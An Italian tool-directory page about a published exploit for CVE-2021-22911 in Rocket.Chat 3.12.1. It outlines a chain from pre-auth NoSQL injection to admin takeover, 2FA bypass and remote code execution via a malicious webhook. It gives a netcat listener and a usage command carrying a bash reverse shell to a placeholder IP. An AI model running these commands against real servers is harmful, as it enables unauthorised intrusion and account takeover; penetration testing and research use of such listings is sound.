Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/faridi-m/cve-2021-22911-rocketchat
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubfaridi-m/cve-2021-22911-rocketchat

CVE-2021-22911-RocketChat

Exploit per Rocket.Chat 3.12.1 RCE tramite iniezione NoSQL pre-auth, perdita del segreto TOTP dell'amministratore e del token di reset della password per ottenere esecuzione di codice remoto attraverso integrazione webhook malevola.

Vedi Repository
226 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-22911 — Rocket.Chat 3.12.1 RCE (Improvised)

Descrizione

Sfrutta una vulnerabilità di NoSQL injection pre-autenticazione in Rocket.Chat 3.12.1 per divulgare il segreto TOTP dell'admin e il token di reset della password, impossessarsi dell'account admin e ottenere RCE tramite una webhook integration malevola.

Versione Affetta

Rocket.Chat <= 3.12.1

Requisiti

pip install -r requirements.txt

Setup - Avviare prima un Listener

Prima di eseguire l'exploit, avvia un netcat listener in un terminale separato per ricevere la reverse shell in entrata:

root@kitploit:~
nc -lvnp 4444

Tieni questo terminale aperto. Una volta che l'exploit viene eseguito con successo, la tua shell apparirà qui.

Utilizzo

root@kitploit:~
python3 pwn_rocketchat.py \
  -t 'http://TARGET:3000' \
  -u 'USERNAME' \
  -p 'PASSWORD' \
  -e '[email protected]' \
  -a 'adminusername' \
  -c '/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

Argomenti

FlagDescrizione
-tURL del target Rocket.Chat
-uIl tuo nome utente registrato con privilegi bassi
-pLa tua password registrata con privilegi bassi
-eIndirizzo email dell'admin
-aNome utente dell'admin
-cComando per la reverse shell
-vModalità verbosa (mostra risposte raw)

Come funziona

  1. Autenticazione come utente con privilegi bassi tramite protocollo DDP
  2. Divulgazione del segreto TOTP dell'admin tramite NoSQL $where injection
  3. Invio della mail di reset della password dell'admin
  4. Divulgazione del token di reset della password dell'admin tramite NoSQL $where injection
  5. Reset della password dell'admin bypassando il 2FA usando il segreto TOTP divulgato
  6. Creazione di una webhook integration malevola e attivazione della RCE

Disclaimer

Questo strumento è solo per scopi educativi e test di penetrazione autorizzati. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento. Ottieni sempre la dovuta autorizzazione scritta prima di testare.

Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2021-22911
Scarica lo strumento